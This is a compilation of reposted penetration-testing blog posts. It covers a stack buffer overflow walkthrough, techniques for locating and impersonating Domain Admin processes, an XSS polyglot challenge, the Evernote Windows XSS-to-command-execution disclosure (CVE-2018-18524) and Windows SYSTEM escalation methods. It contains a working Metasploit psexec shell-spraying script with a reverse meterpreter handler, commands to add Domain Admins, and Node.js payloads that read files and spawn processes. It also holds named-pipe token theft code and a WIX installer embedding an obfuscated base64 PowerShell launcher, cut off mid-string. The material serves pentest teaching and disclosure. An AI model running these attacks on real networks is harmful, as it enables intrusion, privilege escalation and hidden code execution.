-> We already discussed that if the modified variable is not 0, the message “you have changed the ‘modified’ variable” will be printed. But if we look at the program, there is no line of code that ever changes the modified variable's value. So how can it be done?

-> The line where it takes user input and writes it into the char array buffer is actually our way in to change the value of modified. The gets(buffer); call is the vulnerable code.

In the code we can see that the modified variable and the char array buffer are declared next to each other.

This means that when these instructions are executed by the processor, the modified variable and the buffer array end up adjacent to each other in the stack frame.

So, what does this mean?
-> When we feed the buffer more input than it can hold, the extra input overwrites the adjacent memory location, in this case the location holding the modified variable. Thus, the modified variable will no longer be 0 and the success message will be printed.

The buffer overflow is what makes the above scenario possible. Let's see it in more detail.

First we will try to execute the program with some input and see where the overflow happens.
-> We already know the char array buffer is 64 bytes. So we try entering 60, 62 and 64 ‘A’s into our program. As we can see, the modified variable is not changed and the failure message is printed.

-> But when we enter 65 A’s into our program, the value of the modified variable mysteriously changes and the success message is printed.

-> The buffer overflow happens after the 64th byte of input, and it overwrites the memory location right after the buffer, i.e. where the modified variable is stored.

Let's load our program in GDB and see how the modified variable's memory location gets overwritten.
-> As we can see, breakpoints 1 and 2 get hit, and then we check the value of modified by typing x/xw $esp+0x5c (stack register + offset). In the disassembled main function we saw that the value 0 is assigned to the modified variable by the instruction movl $0x0,0x5c(%esp); that is why we check the value of modified at that offset from the stack register ESP. The value of the modified variable at stack location 0xbffff10c is 0x00000000.

-> After stepping through, it asks us to enter the input. We know the 65th byte is the point where the buffer overflows, so we enter 65 A’s and then check the stack frame.

-> As we can see, our input A, i.e. 41, is all over the stack. But we are only concerned with the adjacent memory location where the modified variable lives. By quickly checking it we can see that the value at the stack address of the modified variable, 0xbffff10c, has changed from 0x00000000 to 0x00000041.

-> This means that when the buffer overflow took place it overwrote the adjacent memory location 0xbffff10c with 0x00000041.

-> As we step through the next instruction we can see the success message “you have changed the ‘modified’ variable” printed on the screen.

This was all possible because there was insufficient bounds checking when the user input was being written into the char array buffer. This led to an overflow, and the adjacent memory location (the modified variable) got overwritten.

Voila !!!

We have successfully learned the fundamentals of process memory, stack operations and buffer overflows in detail. This was only the concept of how a buffer overflow takes place; we still haven't used this vulnerability to actually exploit the system. In the next blog we will see how to execute arbitrary commands through shellcode using this buffer overflow vulnerability.

Till then, go and learn as much as possible about assembly and GDB, because we are going to use them extensively in future blogposts.

5 Ways to Find Systems Running Domain Admin Processes

( Original text by Scott Sutherland )

Introduction

Migrating to Domain Admin processes is a common way penetration testers are able to impersonate Domain Admin accounts on the network. However, before a pentester can do that, they need to know what systems those processes are running on. In this blog I’ll cover 5 techniques to help you do that. The techniques that will be covered include:

  1. Checking Locally
  2. Querying Domain Controllers for Active Domain User Sessions
  3. Scanning Remote Systems for Running Tasks
  4. Scanning Remote Systems for NetBIOS Information
  5. PSExec Shell Spraying Remote Systems for Auth Tokens

Obtaining Domain Admin Privileges

For the most part, this blog will focus on identifying systems that are running Domain Admin processes. However, for the sake of context, I’ve outlined the standard process many penetration testers use to obtain Domain Admin privileges.

  1. Identify target systems and applications
  2. Identify potential vulnerabilities
  3. Exploit vulnerabilities to obtain initial access
  4. Escalate privileges on the compromised system
  5. Locate Domain Admin processes/authentication tokens locally or on Remote Systems
  6. Authenticate to a remote system running Domain Admin Processes by passing the local Administrator’s password hash, cracking passwords, or dumping passwords with a tool like mimikatz
  7. Migrate to a Domain Admin Process
  8. Create a Domain Admin

The process as a whole is well known in the penetration testing community, and you should be able to find plenty of blogs, white papers, and video tutorials via Google if you’re interested in more details. Moving forward, I will only be focusing on options for number 5.

Finding Domain Admin Processes

Ok, enough of my ramblings. As promised, below are 5 techniques for finding Domain Admin processes on the network.

Technique 1: Checking Locally

Always check the initially compromised system first. There’s really no point in running around the network looking for Domain Admin processes if you already have one. Below is a simple way to check if any Domain Admin processes are running using native commands:

  1. Run the following command to get a list of domain admins: net group “Domain Admins” /domain
  2. Run the following command to list processes and process owners. The account running the process should be in the 7th column: Tasklist /v
  3. Cross reference the task list with the Domain Admin list to see if you have a winner.

It would be nice if Domain Admin processes were always available on the system initially compromised, but sometimes that is not the case. So the next four techniques will help you find Domain Admin processes on remote domain systems.

Technique 2: Querying Domain Controllers for Active Domain User Sessions

To my knowledge this technique is a NetSPI original. We wanted a way to identify active Domain Admin processes and logins without having to spray shells all over the network or do any scanning that would set off IDS. Eventually it occurred to us to simply query the domain controllers for a list of active domain user sessions and cross reference it with the Domain Admin list. The only catch is you have to query all of the domain controllers. Below I’ve provided the basic steps to get a list of systems with active Domain Admin sessions as a domain user:

  1. Gather a list of Domain Controllers from the “Domain Controllers” OU using LDAP queries or net commands. I’ve provided a net command example below:

     net group “Domain Controllers” /domain

     Important Note: The OU is the best source of truth for a list of domain controllers, but keep in mind that you should really go through the process of enumerating trusted domains and targeting those domain controllers as well.

    Alternatively, you can look them up via DNS.

    Nslookup –type=SRV _ldap._tcp.

  2. Gather a list of Domain Admins from the “Domain Admins” group using LDAP queries or net commands. I’ve provided a net command example below:

     net group “Domain Admins” /domain
  3. Gather a list of all of the active domain sessions by querying each of the domain controllers using Netsess.exe. Netsess is a great tool from Joe Richards that wraps around the native Windows function “netsessionenum”. It will return the IP address of the active session, the domain account, the session start time, and the idle time. Below is a command example:

     Netsess.exe –h
  4. Cross reference the Domain Admin list with the active session list to determine which IP addresses have active domain tokens on them. In more secure environments you may have to wait for a Domain Admin or Service account with Domain Admin privileges to take actions on the network. What that really means is you’ll have to run through the process multiple times, or script it out. Below is a very quick and dirty Windows command line script that uses netsess. Keep in mind that dcs.txt has a list of domain controllers and admins.txt has a list of Domain Admins.

     FOR /F %i in (dcs.txt) do @echo [+] Querying DC %i && @netsess -h %i 2>nul > sessions.txt &&
     FOR /F %a in (admins.txt) DO @type sessions.txt | @findstr /I %a

I wrote a basic batch script named Get Domain Admins (GDA), which can be downloaded, that automates the whole process. The dependencies are listed in the readme file. I would like to give a shout out to Mark Beard and Ivan Dasilva for helping me out on it. I’ve also created a batch file called Get Domain Users (GDU) for Windows dictionary attacks which has similar options, but more dependencies. If you’re interested it can be downloaded by clicking the link above.

Technique 3: Scanning Remote Systems for Running Tasks

I typically have success with the first two options. However, I came across this method in a pauldotcom blog by LaNMSteR53 and I thought it was a clever alternative. Once you are running as the shared local administrator account on a domain system you can run the script below to scan systems for Domain Admin Tasks. Similar to the last technique you will need to enumerate the Domain Admins first. In the script below ips.txt contains a list of the target systems and the names.txt contains a list of the Domain Admins.

FOR /F %i in (ips.txt) DO @echo [+] %i && @tasklist /V /S %i /U user /P password 2>NUL > output.txt &&
FOR /F %n in (names.txt) DO @type output.txt | findstr %n > NUL && echo [!] %n was found running a process on %i && pause

The original post is: Crawling for Domain Admin with Tasklist if you’re interested.

Technique 4: Scanning Remote Systems for NetBIOS Information

Some Windows systems still allow users to query for logged-in users via NetBIOS queries. The information can be obtained using the native nbtstat tool. The user name is indicated by “<03>” in the nbtstat results.

  1. Below is another quick and dirty Windows command line script that will scan remote systems for active Domain Admin sessions. Note: the script can be run as a non-domain user.

     for /F %i in (ips.txt) do @echo [+] Checking %i && nbtstat -A %i 2>NUL >nbsessions.txt && FOR /F %n in (admins.txt) DO @type nbsessions.txt | findstr /I %n > NUL && echo [!] %n was found logged into %i
  2. You can also use the nbtscan tool, which runs a little faster. It can be downloaded here. Another basic script example is below:

     for /F %i in (ips.txt) do @echo [+] Checking %i && nbtscan -f %i 2>NUL >nbsessions.txt && FOR /F %n in (admins.txt) DO @type nbsessions.txt | findstr /I %n > NUL && echo [!] %n was found logged into %i

Technique 5: PSExec Shell Spraying Remote Systems for Auth Tokens

Psexec “shell spraying” is the act of using the Psexec module in Metasploit to install shells (typically meterpreter) on hundreds of systems using shared local administrative credentials. Many pentesters use this method in concert with other Metasploit functionality to identify Domain Admin tokens. This is my least favorite technique, but since a large portion of the pentest community is actively using it I feel that I need to include it. I like getting shells as much as the next guy, but kicking off 500 of them in a production environment could cause availability issues that clients will be really unhappy with. To be fair, having 500 shells does mean you can scrape data faster, but I still think it creates more risk than value. Regardless, below is the process I have seen a lot of people using:

  1. Install Metasploit 3.5 or greater.
  2. Copy and paste the script below into a text file and save it into the Metasploit directory as psexec_spray.rc. I originally found this script on Jabra’s blog.

     #Setup Multi Handler to accept multiple incoming connections
     use multi/handler
     setg PAYLOAD windows/meterpreter/reverse_tcp
     setg LHOST 0.0.0.0
     setg LPORT 55555
     set ExitOnSession false
     exploit -j -z

     #Setup Credentials
     use windows/smb/psexec
     set SMBUser
     set SMBPass

     #Setup Domain as local host unless using domain credentials
     set SMBDomain .

     #Disable payload handler in psexec modules (using multi handler)
     set DisablePayloadHandler true

     #Run Ruby code to scan desired network range using some REX API stuff – range walker
     #note: could also accept ip addresses from a file by replacing rhosts = "192.168.74.0/24" with rhosts = File.readlines("c:\systems.txt")
     require 'rex/socket/range_walker'
     rhosts = "192.168.1.0/24"
     iplist = Rex::Socket::RangeWalker.new(rhosts)
     iplist.each do |rhost|
          #self allows for execution of commands in msfconsole
          self.run_single("set RHOST #{rhost}")
          #-j -z send the session to the background
          self.run_single("exploit -j -z")
     end

  3. Update the smbuser and smbpass parameters.
  4. Issue the following command to run the script. The psexec_spray.rc script will attempt to blindly install meterpreter shells on every system in the 192.168.1.0/24 network using the provided credentials:

     msfconsole –r psexec_spray.rc
  5. You can then use the Metasploit module token_hunter to identify Domain Admin tokens on each of the shelled systems. I’ve outlined the steps below.
    1. Create a file containing a list of the Domain Admins like so: COMPANY\joe-admin COMPANY\bill-admin COMPANY\david-admin
    2. Load the token_hunter module in the msfconsole: msf> load token_hunter
    3. Run token hunter to list the sessions containing Domain Admin tokens: msf> token_hunt_user -f /tmp/domain-admin.txt
  6. Alternatively, you can use the following command to get a list of currently logged-in users from each of the shelled systems and manually look for Domain Admins: Sessions –s loggedin

What Now?

If you already have a meterpreter session you can use Incognito to impersonate the Domain Admin, or add a new one. Incognito can attempt to add a new Domain Admin blindly by iterating through all of the available authentication tokens on the system. Below are the basic commands to do that in meterpreter.

  1. Load Incognito in your active meterpreter session with the following command: load incognito
  2. Attempt to add a Domain Admin with the authentication tokens on the system: add_user -h
     add_group “Domain Admins” -h

If you’re interested in creating a new Domain Admin using another option you can use the instructions below:

  1. In the meterpreter console, type the following command to view processes: ps
  2. In the meterpreter console, find a process running as a Domain Admin and migrate to it using the following command: migrate
  3. In the meterpreter console, type the following command to get an OS shell: shell
  4. Type the following native Windows commands to add a new Domain Admin: net user /add /domain
     net group “Domain Admins” /add /domain

Wrap Up

As you can see there are quite a few options for identifying Domain Admin processes and authentication tokens. I recommend using the low impact options to help prevent availability issues and unhappy clients. I’m sure as time goes on people will come up with better ideas, but until then remember to have fun and hack responsibly.


XSS Polyglot Challenge v2

( Original text by @filedescriptor )

alert() in more than one context.


What is an XSS Polyglot?

An XSS payload which runs in multiple contexts. For example, '--><svg onload=alert()> can pop alerts in <div class=''--><svg onload=alert()>'></div> and <!--'--><svg onload=alert()>-->. It is useful in testing XSS because it minimizes manual effort and increases the success rate of blind XSS.

Rules
  • You will be given 20 common contexts in black-box
  • No DOM sinks or external libraries are involved
  • Plain HTML injection with minimum filtering
  • A headless Chrome will try your payload
  • Your payload should run alert() in 2+ contexts
  • Payloads exceeding 1024 characters will always fail
  • Network is disabled
Contexts
<div class="{{payload}}"></div>
<div class='{{payload}}'></div>
<title>{{payload}}</title>
<textarea>{{payload}}</textarea>
<style>{{payload}}</style>
<noscript>{{payload}}</noscript>
<noembed>{{payload}}</noembed>
<template>{{payload}}</template>
<frameset>{{payload}}</frameset>
<select><option>{{payload}}</option></select>
<script type="text/template">{{payload}}</script>
<!--{{payload}}-->
<iframe src="{{payload}}"></iframe> " → &quot;
<iframe srcdoc="{{payload}}"></iframe> " → &quot; < → &lt;
<script>"{{payload}}"</script> </script → <\/script
<script>'{{payload}}'</script> </script → <\/script
<script>`{{payload}}`</script> </script → <\/script
<script>//{{payload}}</script> </script → <\/script
<script>/*{{payload}}*/</script> </script → <\/script
<script>"{{payload}}"</script> </script → <\/script " → \"

More examples are available at the link in the original post.

Evernote For Windows Read Local File and Command Execute Vulnerabilities

( Original text by TongQing Zhu@Knownsec 404 Team )

0x00 TL;DR

  1. A stored cross-site scripting (XSS) issue was fixed in version 6.15.
  2. If a stored XSS payload is in your note, the JavaScript code will still be executed in the latest Evernote for Windows. It means I can create a stored XSS in version 6.14 and it will keep working.
  3. Present mode is built on NodeWebKit, and I can control it via the stored XSS.
  4. In the end I successfully read «C:\Windows\win.ini» and opened calc.exe.

0x01 A Stored XSS In Version 6.14

Thanks to @sebao, who told me how he found a stored XSS in Evernote: 1. Add a picture to your note. 2. Right click and rename this picture to something like: " onclick="alert(1)">.jpg 3. Open this note and click this picture; it will alert(1).

On 2018/09/20, Evernote for Windows 6.15 GA was released and fixed the issue @sebao reported.

In Evernote for Windows 6.15, the characters <, > and " are filtered when a filename is inserted, but the note that had already been named with sebao's XSS payload could still alert(1). It means nothing is filtered when the filename is output, so I could use the stored XSS again.

0x02 JS Inject In NodeWebKit

Of course, I don't think this alone is a serious security problem, so I decided to look for other vulnerabilities like RCE or local file read.

In version 6.14, I renamed the picture to " onclick="alert(1)"><script src="http://172.16.4.1:8000/1.js">.jpg for convenience; it allows me to load the JS file from a remote server. Then I installed Evernote for Windows 6.15.

I tried some special APIs, like evernote.openAttachment and goog.loadModuleFromUrl, but failed.

After failing many times, I decided to browse all the files under the path C:\\Program Files(x86)\Evernote\Evernote\. I found that Evernote ships a NodeWebKit in C:\\Program Files(x86)\Evernote\Evernote\NodeWebKit and that Present mode uses it.

More good news: we can execute Node.js code via the stored XSS while in Present mode.

0x03 Read Local File & Command Execute

I tried to use require('child_process').exec, but it failed with: Module name "child_process" has not been loaded yet for context. So I needed another way.

Very luckily, I found this article: How we exploited a remote code execution vulnerability in math.js.

I managed to read a local file successfully.

//read local file javascript code
alert("Try to read C:\\\\Windows\\win.ini");
try{
  var buffer = new Buffer(8192);
  process.binding('fs').read(process.binding('fs').open('..\\..\\..\\..\\..\\..\\..\\Windows\\win.ini', 0, 0600), buffer, 0, 4096); 
  alert(buffer);
}
catch(err){
  alert(err);
}

But in the NodeWebKit environment there is no Object or Array available (I don't know why), so I used spawn_sync instead (getting the environment from window.process.env):

// command executed
try{
  spawn_sync = process.binding('spawn_sync');
  envPairs = [];
  for (var key in window.process.env) {
    envPairs.push(key + '=' + window.process.env[key]);
  }
  args = [];

  const options = {
    file: 'C:\\\\Windows\\system32\\calc.exe',
    args: args,
    envPairs: envPairs,
    stdio: [
      { type: 'pipe', readable: true, writable: false },
      { type: 'pipe', readable: false, writable: true },
      { type: 'pipe', readable: false, writable: true } 
    ]
  };
  spawn_sync.spawn(options);
}
catch(err){
  alert(err);
}

0x04 Use Share Function

Now I can read files on my own computer and execute calc.exe, but I need to prove that this vulnerability can affect other people. I signed up for a new account, *****n4n@gmail.com, and shared this note with it.

*****n4n@gmail.com receives a message in Work Chat:

If *****n4n@gmail.com decides to open it and use Present mode, the Node.js code will be executed.

0x05 Report Timeline

2018/09/27: Found the read local file and command execution vulnerabilities and reported them to security@evernote.com
2018/09/27: Evernote confirmed the vulnerabilities
2018/10/15: Evernote fixed the vulnerabilities in Evernote For Windows 6.16.1 beta and added my name to the Hall of Fame
2018/10/19: Requested CVE ID: CVE-2018-18524
2018/11/05: After Evernote For Windows 6.16.4 was released, public disclosure

 

Alternative methods of becoming SYSTEM

( Original text by XPN )

For many pentesters, Meterpreter’s getsystem command has become the default method of gaining SYSTEM account privileges, but have you ever have wondered just how this works behind the scenes?

In this post I will show the details of how this technique works, and explore a couple of methods which are not quite as popular, but may help evade detection on those tricky redteam engagements.

Meterpreter’s «getsystem»

Most of you will have used the getsystem module in Meterpreter before. For those that haven’t, getsystem is a module offered by the Metasploit-Framework which allows an administrative account to escalate to the local SYSTEM account, usually from local Administrator.

Before continuing we first need to understand a little on how a process can impersonate another user. Impersonation is a useful method provided by Windows in which a process can impersonate another user’s security context. For example, if a process acting as a FTP server allows a user to authenticate and only wants to allow access to files owned by a particular user, the process can impersonate that user account and allow Windows to enforce security.

To facilitate impersonation, Windows exposes numerous native API’s to developers, for example:

  • ImpersonateNamedPipeClient
  • ImpersonateLoggedOnUser
  • RevertToSelf
  • LogonUser
  • OpenProcessToken

Of these, the ImpersonateNamedPipeClient API call is key to the getsystem module’s functionality, and takes credit for how it achieves its privilege escalation. This API call allows a process to impersonate the access token of another process which connects to a named pipe and performs a write of data to that pipe (that last requirement is important ;). For example, if a process belonging to «victim» connects and writes to a named pipe belonging to «attacker», the attacker can call ImpersonateNamedPipeClient to retrieve an impersonation token belonging to «victim», and therefore impersonate this user. Obviously, this opens up a huge security hole, and for this reason a process must hold the SeImpersonatePrivilege privilege.

This privilege is by default only available to a number of high privileged users:

SeImpersonatePrivilege

This does however mean that a local Administrator account can use ImpersonateNamedPipeClient, which is exactly how getsystem works:

  1. getsystem creates a new Windows service, set to run as SYSTEM, which when started connects to a named pipe.
  2. getsystem spawns a process, which creates a named pipe and awaits a connection from the service.
  3. The Windows service is started, causing a connection to be made to the named pipe.
  4. The process receives the connection, and calls ImpersonateNamedPipeClient, resulting in an impersonation token being created for the SYSTEM user.

All that is left to do is to spawn cmd.exe with the newly gathered SYSTEM impersonation token, and we have a SYSTEM privileged process.

To show how this can be achieved outside of the Meterpreter-Framework, I’ve previously released a simple tool which will spawn a SYSTEM shell when executed. This tool follows the same steps as above, and can be found on my github account here.
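
For readers who want to see the moving parts in code, below is a heavily condensed sketch of the same named-pipe trick (an illustration, not the released tool): error handling is omitted, the pipe name is made up, and it assumes a SYSTEM service has already been created separately that connects to \\.\pipe\demopipe and writes at least one byte to it.

#include <windows.h>

int main(void)
{
    HANDLE hPipe, hToken = NULL, hDupToken = NULL;
    char buf[1];
    DWORD bytesRead;
    STARTUPINFOW si = { sizeof(si) };
    PROCESS_INFORMATION pi;

    // Create the named pipe and wait for the SYSTEM service to connect and write to it.
    hPipe = CreateNamedPipeA("\\\\.\\pipe\\demopipe", PIPE_ACCESS_DUPLEX,
                             PIPE_TYPE_BYTE | PIPE_WAIT, 1, 0, 0, 0, NULL);
    ConnectNamedPipe(hPipe, NULL);
    ReadFile(hPipe, buf, 1, &bytesRead, NULL);   // a write must occur before impersonation works

    // Impersonate the connecting client (the SYSTEM service) on this thread.
    ImpersonateNamedPipeClient(hPipe);

    // Grab the resulting impersonation token and duplicate it into a primary token.
    OpenThreadToken(GetCurrentThread(), TOKEN_ALL_ACCESS, FALSE, &hToken);
    DuplicateTokenEx(hToken, TOKEN_ALL_ACCESS, NULL, SecurityImpersonation,
                     TokenPrimary, &hDupToken);

    // Spawn cmd.exe using the duplicated SYSTEM token.
    CreateProcessWithTokenW(hDupToken, 0, L"C:\\Windows\\system32\\cmd.exe", NULL,
                            CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi);
    return 0;
}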

To see how this works when executed, a demo can be found below:

Now that we have an idea just how getsystem works, let’s look at a few alternative methods which can allow you to grab SYSTEM.

MSIExec method

For anyone unlucky enough to follow me on Twitter, you may have seen my recent tweet about using a .MSI package to spawn a SYSTEM process:

Adam Chester@_xpn_

There is something nice about embedding a Powershell one-liner in a .MSI, nice alternative way to execute as SYSTEM 🙂

This came about after a bit of research I was doing into the Duqu 2.0 malware, in which this APT actor delivered malware packaged within an MSI file.

It turns out that a benefit of launching your code via an MSI is the SYSTEM privileges that you gain during the install process. To understand how this works, we need to look at the WIX Toolset, which is an open source project used to create MSI files from XML build scripts.

The WIX Framework is made up of several tools, but the two that we will focus on are:

  • candle.exe — Takes a .WIX XML file and outputs a .WIXOBJ
  • light.exe — Takes a .WIXOBJ and creates a .MSI

Reviewing the documentation for WIX, we see that custom actions are provided, which give the developer a way to launch scripts and processes during the install process. Within the CustomAction documentation, we see something interesting:


This documents a simple way in which a MSI can be used to launch processes as SYSTEM, by providing a custom action with an Impersonate attribute set to false.

When crafted, our WIX file will look like this:

<?xml version="1.0"?>
<Wix xmlns="http://schemas.microsoft.com/wix/2006/wi">
<Product Id="*" UpgradeCode="12345678-1234-1234-1234-111111111111" Name="Example Product Name" Version="0.0.1" Manufacturer="@_xpn_" Language="1033">
<Package InstallerVersion="200" Compressed="yes" Comments="Windows Installer Package"/>
<Media Id="1" Cabinet="product.cab" EmbedCab="yes"/>
<Directory Id="TARGETDIR" Name="SourceDir">
<Directory Id="ProgramFilesFolder">
<Directory Id="INSTALLLOCATION" Name="Example">
<Component Id="ApplicationFiles" Guid="12345678-1234-1234-1234-222222222222">
<File Id="ApplicationFile1" Source="example.exe"/>
</Component>
</Directory>
</Directory>
</Directory>
<Feature Id="DefaultFeature" Level="1">
<ComponentRef Id="ApplicationFiles"/>
</Feature>
<Property Id=»cmdline»>powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAJwBIADQAcwBJAEEARABlAGgAQQBGAG8AQwBBADcAVgBXAGIAVwAvAGEAUwBCAEQAKwBuAEUAcgA5AEQAMQBhAEYAaABLADAAUwBEAEkAUwBVAEoAbABLAGwAVwAvAE8AZQBBAEkARQA0AEcAQQBoAEYAcAA0ADIAOQBOAGcAdQBMADEAMQAyAHYAZQBlAHYAMQB2ADkAOABZADcASgBTAHEAeQBWADIAdgAwAGwAbQBKADIAUABYAE8ANwBEADcAegB6AEQATQA3AGQAaQBQAGYAbABwAFQANwBTAHIAZwBZADMAVwArAFgAZQBLADEAOABmAGYAdgBtAHIASQA4AEYAWABpAGwAcQBaAHQAMABjAFAAeABRAHIAKwA0AEQAdwBmAGsANwBKAGkASABFAHoATQBNAGoAVgBwAGQAWABUAHoAcwA3AEEASwBpAE8AVwBmADcAYgB0AFYAYQBHAHMAZgBGAEwAVQBLAFEAcQBDAEcAbAA5AGgANgBzACsAdQByADYAdQBSAEUATQBTAFgAeAAzAG0AKwBTAFMAUQBLAFEANwBKADYAWQBwAFMARQBxAHEAYgA4AHAAWQB6AG0AUgBKAEQAegB1ADYAYwBGAHMAYQBYAHkAVgBjAG4AOABtAFcAOAB5AC8AbwBSAFoAWQByAGEAcgBZAG4AdABPAGwASABQAGsATwAvAEYAYQBoADkAcwA0AHgAcABnADMAQQAwAGEAbABtAHYAMwA4AE8AYQB0AE4AegA0AHUAegBmAFAAMQBMAGgARgBtAG8AWgBzADEAZABLAE0AawBxADcAegBDAFcAMQBaAFIAdgBXAG4AegBnAHcAeQA0AGcAYQByAFoATABiAGMARgBEADcAcwByADgAaQBQAG8AWABwAGYAegBRAEQANwBGAEwAZQByAEQAYgBtAG4AUwBKAG4ASABNAG4AegBHAG8AUQBDAGYAdwBKAEkAaQBQAGgASwA4ADgAeAB4AFoAcwBjAFQAZABRAHMARABQAHUAQwAyADgAaAB4AEIAQQBuAEIASQA5AC8AMgAxADMAeABKADEASQB3AGYATQBaAFoAVAAvAGwAQwBuAEMAWQBMADcAeQBKAGQAMABSAFcAQgBkAEUAcwBFAEQAawA0AGcAMQB0AFUAbQBZAGIAMgBIAGYAWQBlAFMAZQB1AEQATwAxAFIAegBaAHAANABMAC8AcQBwAEoANAA2AGcAVgBWAGYAQwBpADAASAAyAFgAawBGAGEAcABjADcARQBTAE4ASAA3ADYAegAyAE0AOQBqAFQAcgBHAHIAdwAvAEoAaABaAG8ATwBQAGIAMgB6AGQAdgAzADcAaQBwAE0ASwBMAHEAZQBuAGcAcQBDAGgAaQBkAFQAUQA5AGoAQQBuAGoAVgBQAGcALwBwAHcAZQA2AFQAVQBzAGcAcABYAFQAZwBWAFMAeQA1ADIATQBNADAAOABpAEkAaABvAE0AMgBVAGEANQAyAEkANgBtAHkAawBaAHUANwBnAHEANQBsADcAMwBMADYAYgBHAFkARQBxAHMAZQBjAEcAeAB1AGwAVgA0AFAAYgBVADQAZABXAGIAZwBsAG0AUQBxAHMANgA2AEkAWABxAGwAUwBpAFoAZABlAEYAMQAyAE4AdQBOAFEAbgB0AFoAMgBQAFYAOQBSAE8AZABhAFcAKwBSAEQAOQB4AEcAVABtAEUAbQBrAC8ATgBlAG8AQgBOAHoAUwBZAEwAeABLAGsAUgBSAGoAdwBzAFkAegBKAHoAeQB2AFIAbgB0AC8AcQBLAHkAbQBkAGYASQA2AEwATQBJAFEATABaAGsATQBJAFEAVQBFAEYAMgB0AFIALwBCAEgAUABPAGoAWgB0AHQAKwBsADYAeQBBAHEAdQBNADgAQwAyAGwAdwBRAGMAMABrAHQAVQA0AFUAdgBFAHQAUABqACsAZABnAGwASwAwAHkASABJAFkANQBwAFIAOQBCAE8AZABrADUAeABTAFMAWQBFAFMAZQBuAEkARAArAGsAeQBSAEsASwBKAEQAOABNAHMAOQAvAGgAZABpAE0AbQBxAFkAMQBEAG0AVwA0ADMAMAAwADYAbwBUAEkANgBzAGMAagArAFUASQByAEkAaABnAFIARAArAGcAeABrAFEAbQAyAEkAVwBzADUARgBUAFcAdABRAGgAeABzADYAawBYAG4AcAAwADkAawBVAHUAcQBwAGcAeAA2AG4AdQB3ADAAeABwAHkAQQBXADkAaQBEAGsAdwBaAHkAMABJAEEAeQBvAE0ARQB0AEwAeABKAFoASABzAFYATQBMAEkAQwBtADAATgBwAE4AeABqADIAbwBKAEMAVABVAGoAagBvAEMASAB2AEUAeQBiADQAQQBNAGwAWAA2AFUAZABZAHgASQB5AGsAVgBKAHgAQQBoAHoAUwBiAGoATQBxAGQAWQBWAEUAaQA0AEoARwBKADIAVQAwAG4AOQBIAG8AcQBUAEsAeQBMAEYAVQB4AFUAawB5AFkAdQBhAFYAcwAzAFUAMgBNAGwAWQA2ADUAbgA5ADMAcgBEADIAcwBVAEkAVABpAGcANgBFAEMAQQBsAGsATgBBAFIAZgBHAFQAZwBrAEgAOABxAG0ARgBFAEMAVgArAGsANgAvAG8AMQBVAEUAegA2AFQAdABzADYANQB0AEwARwBrAFIAYgBXAGkAeAAzAFkAWAAvAEkAYgAxAG8AOAAxAHIARgB1AGIAMQBaAHQASAB
SAFIAMgA4ADUAZAAxAEEANwBiADMAVgBhAC8ATgBtAGkAMQB5AHUAcwBiADAAeQBwAEwAcwA5ADYAVwB0AC8AMgAyADcATgBiAEgAaQA0AFcASgBXAHYAZgBEAGkAWAB4AHMAbwA5AFkARABMAFMAdwBuADUAWAAxAHcAUQAvAGQAbQBCAHoAbQBUAHIAZgA1AGgAYgArAHcAMwBCAFcATwA3AFgAMwBpAE8ATwA2AG0ANQByAGwAZAB4AHoAZgB2AGkAWgBZAE4AMgBSAHQAVwBCAFUAUwBqAGgAVABxADAAZQBkAFUAYgBHAHgAaQBpAFUAdwB6AHIAZAB0AEEAWgAwAE8ARgBqAGUATgBPAFQAVAB4AEcASgA0ADYATwByAGUAdQBIAGkARgA2AGIAWQBqAEYAbABhAFIAZAAvAGQAdABoAEoAcgB6AEMAMwB0AC8ANAAxAHIATgBlAGQAZgBaAFQAVgByADYAMQBhAGkAOABSAEgAVwBFAHEAbgA3AGQAYQBoAGoAOABkAG0ASQBJADEATgBjAHQANwBBAFgAYwAzAFUAQwBRAEkANgArAEsAagBJAFoATgB5AGUATgBnADIARABBAEcAZwA0AGEAQgBoAHMAMwBGAGwAOQBxAFYANwBvAEgAdgBHAE0AKwBOAGsAVgBXAGkAagA4AEgANABmAGcANwB6AEIAawBDADQAMQBRAHYAbAB0AGsAUAAyAGYARABJAEEALwB5AFoASAAyAEwAcwBIAEcANgA5AGEAcwB1AGMAdQAyAE4AVABlAEkAKwBOADkAagA0AGMAbAB2AEQAUQA0AE0AcwBDAG0AOABmAGcARgBjAEUAMgBDAFIAcAAvAEIAKwBzAE8AdwB4AEoASABGAGUAbQBPAE0ATwBvACsANwBoAHEANABYAEoALwAwAHkAYQBoAFgAbwBxAE8AbQBoAGUARQB2AHMARwBRAE8ATQB3AG4AVgB0AFgAOQBPAEwAbABzAE8AZAAwAFcAVgB2ADQAdQByAFcAbQBGAFgAMABXAHYAVQBoAHMARgAxAGQAMQB6AGUAdAAyAHEAMwA5AFcATgB4ACsAdgBLAHQAOAA3AEkAeQBvAHQAZQBKAG8AcQBPAHYAVwB1ADEAZwBiAEkASQA0AE0ARwBlAC8ARwBuAGMAdQBUAGoATAA5ADIAcgBYAGUAeABDAE8AZQBZAGcAUgBMAGcAcgBrADYAcgBzAGMARgBGAEkANwBsAHcAKwA1AHoARwBIAHEAcgA2ADMASgBHAFgAUgBQAGkARQBRAGYAdQBDAEIAcABjAEsARwBqAEgARwA3AGIAZwBMAEgASwA1AG4ANgBFAEQASAB2AGoAQwBEAG8AaAB6AEMAOABLA